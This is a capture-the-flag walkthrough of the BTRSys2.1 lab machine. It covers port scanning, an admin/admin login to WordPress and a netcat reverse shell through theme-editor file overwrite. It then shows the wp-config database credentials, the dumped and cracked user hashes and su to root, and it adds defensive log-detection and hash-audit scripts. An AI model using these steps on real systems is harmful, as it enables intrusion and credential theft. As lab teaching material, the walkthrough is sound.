BTRSys2.1
nmap
(base) [psdon@arch BTRSys2.1]$ mkdir nmap
(base) [psdon@arch BTRSys2.1]$ sudo rustscan -a 192.168.208.50 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
# Nmap 7.92 scan initiated Thu Aug 26 20:10:30 2021 as: nmap -vvv -p 21,22,80 -T4 -A -oA nmap/all-ports-service-scan 192.168.208.50
Nmap scan report for 192.168.208.50 (192.168.208.50)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2021-08-26 20:10:30 PST for 21s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.49.208
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKrYYWK3Xv2EBb0KryPAargHdeVdVuGj+AHTUbH1CyLIuQ3zbtaq2+lr5K/aMqiJ5othz27+RWSJ2NmQ2JeOUBCogFLikCwU6MRDQLHpV+neS3fAKrH5fNnXo+RfnMWBLQaaXBPiUOQaoQc27hRN3SJ1hbVLEF65TY0siTrOj0Lt8SRztwkbfynHEKxMsQi5WWDLTgS7bivCf9VVWwqgmuBbsJAqFExDjLxlxJpH4+93bgEtD9EPV/KKO9B3Inaz8PxC+zXZofhZXloysYoGg4IZzT55JzrRVRuv/cbGcMuGTBpCCkdH01G4NCSgL7YwX13C1Qc+EFX1QExV6k1ePD
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFTsqff4O0hsl+RUR2lXFcbCEkvFcspHALA2RR2DpoD2AlRN/DEpIbW3NETNXxxyKHTtGhUiBSUuw8S9RSBAsnY=
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH91w++CdkbeAkmXYietVhD/73nEaXR/nbeBEyuwLwgq
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Port 80 is open, so let's check /robots.txt.
WordPress
You can see that robots.txt contains an interesting directory called /wordpress. Let's see if we can log in using default credentials: try admin as both the username and the password.
Looks like we were able to log in using those credentials.
Initial Foothold
To get a reverse shell, set a netcat listener first.
(base) [psdon@arch BTRSys2.1]$ sudo nc -lvnp 80
Then go to the theme editor and set the payload.
Find a file you want to overwrite with your PHP reverse shell payload. In my case, I will use the 404.php file.
Edit the file, paste your payload and save. You can use this PHP reverse shell payload, or whatever you prefer.
Visit /wordpress/wp-content/themes/twentyfourteen/404.php and you should receive your shell in your terminal.
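As an added detection example (not part of the original writeup), the Python below scans constructed Apache access-log lines for the edit-then-trigger pattern used above: a POST to the theme editor followed shortly by a direct request for a .php file under a theme directory. The log lines, IPs and timestamps are made up for illustration; the configuration change that removes the editor entirely is setting DISALLOW_FILE_EDIT to true in wp-config.php.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache access-log lines modelling the foothold on this page:
# a theme-editor save, then a direct request for the edited 404.php.
# The IPs, timestamps and sizes are made up for illustration.
SAMPLE_LOG = """\
192.168.49.208 - - [26/Aug/2021:20:14:55 +0800] "POST /wordpress/wp-login.php HTTP/1.1" 302 0
192.168.49.208 - - [26/Aug/2021:20:15:30 +0800] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0
192.168.49.208 - - [26/Aug/2021:20:15:41 +0800] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 0
10.0.0.5 - - [26/Aug/2021:20:16:00 +0800] "GET /wordpress/wp-content/themes/twentyfourteen/style.css HTTP/1.1" 200 811
"""

# Common log format prefix: client, ident, user, [timestamp] "METHOD path proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# A PHP file requested directly from a theme directory: theme templates are
# normally included by WordPress, not fetched by URL, so this is unusual.
THEME_PHP_RE = re.compile(r"/wp-content/themes/[^/]+/.*\.php$")
WINDOW = timedelta(minutes=10)  # how long an editor save stays "suspicious"

def parse_line(line):
    """Return (ip, datetime, method, path-without-query, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0], int(status)

def find_theme_editor_abuse(log_text, window=WINDOW):
    """Flag a client that POSTs to the theme editor and then requests a theme
    .php file directly within `window`, i.e. the edit-then-trigger pattern
    used above. Returns a list of (ip, path) alerts. Hardening note: with
    DISALLOW_FILE_EDIT set in wp-config.php the editor POST cannot succeed."""
    last_edit = {}  # ip -> time of the most recent theme-editor POST
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, when, method, path, _status = rec
        if method == "POST" and path.endswith("/wp-admin/theme-editor.php"):
            last_edit[ip] = when
        elif (method == "GET" and THEME_PHP_RE.search(path)
              and ip in last_edit and when - last_edit[ip] <= window):
            alerts.append((ip, path))
    return alerts
```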
Post Exploitation
Let's check the wp-config.php
www-data@ubuntu:/var/www/html/wordpress$ less wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
There's a MySQL credential in the file, so let's try to log in using root as the username and rootpassword! as the password.
www-data@ubuntu:/var/www/.ssh$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 64
Server version: 5.7.17-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
I found credentials inside the wordpress database.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| deneme |
| mysql |
| performance_schema |
| phpmyadmin |
| sys |
| wordpress |
+--------------------+
7 rows in set (0.01 sec)
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_wordpress |
+----------------------------+
| wp_abtest_experiments |
| wp_abtest_goal_hits |
| wp_abtest_goals |
| wp_abtest_ip_filters |
| wp_abtest_variation_views |
| wp_abtest_variations |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_masta_campaign |
| wp_masta_cronapi |
| wp_masta_list |
| wp_masta_reports |
| wp_masta_responder |
| wp_masta_responder_reports |
| wp_masta_settings |
| wp_masta_subscribers |
| wp_masta_support |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+----------------------------+
26 rows in set (0.00 sec)
mysql> select * from wp_users;
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | root | a318e4507e5a74604aafb45e4741edd3 | btrisk | mdemir@btrisk.com | | 2017-04-24 17:37:04 | | 0 | btrisk |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | admin | ikaya@btrisk.com | | 2017-04-24 17:37:04 | | 4 | admin |
+----+------------+----------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.01 sec)
I have cracked the hashed user_pass of the root user using crackingstation.net. The password we have cracked is roottoor.
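As an added defender-side check (not part of the original writeup), the script below audits the two wp_users rows from the page: it flags rows stored as bare unsalted MD5 rather than WordPress's salted phpass format and looks them up against a constructed list of default and weak passwords. The weak list, which includes the roottoor value reported above, is an assumption for illustration.

```python
import hashlib
import re

# The two rows from the wp_users query on this page (ID, user_login, user_pass).
WP_USERS = [
    (1, "root", "a318e4507e5a74604aafb45e4741edd3"),
    (2, "admin", "21232f297a57a5a743894a0e4a801fc3"),
]

# Constructed short list of default and weak passwords an auditor checks first;
# "roottoor" is the value the writeup reports for the root account.
WEAK_PASSWORDS = ["admin", "password", "root", "roottoor", "wordpress", "123456"]

LEGACY_MD5_RE = re.compile(r"^[0-9a-f]{32}$")

def classify_hash(user_pass):
    """WordPress normally stores salted phpass hashes ($P$...). A bare 32-hex
    value is an unsalted MD5 written straight into the database; WordPress still
    accepts it at login (and only rehashes it after a successful login), so it
    stays crackable by a simple lookup table until then."""
    if user_pass.startswith("$P$"):
        return "phpass"
    if LEGACY_MD5_RE.match(user_pass):
        return "legacy-md5"
    return "unknown"

def audit_wp_users(rows, wordlist):
    """For every row, report the hash scheme and, for legacy MD5 rows, which
    weak-list password (if any) produces that hash. Salted rows are not
    attempted: the point is to find unsalted storage and default passwords."""
    table = {hashlib.md5(p.encode()).hexdigest(): p for p in wordlist}
    findings = []
    for uid, login, user_pass in rows:
        scheme = classify_hash(user_pass)
        weak = table.get(user_pass) if scheme == "legacy-md5" else None
        findings.append({"id": uid, "login": login, "scheme": scheme, "weak_password": weak})
    return findings
```

The admin row resolves to the password admin, which is exactly the default credential that worked on the login form earlier.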
Privilege Escalation
Let's try to login as root using the credentials we have cracked above.
www-data@ubuntu:/var/www/.ssh$ su
Password: roottoor
root@ubuntu:/var/www/.ssh#
You are now root!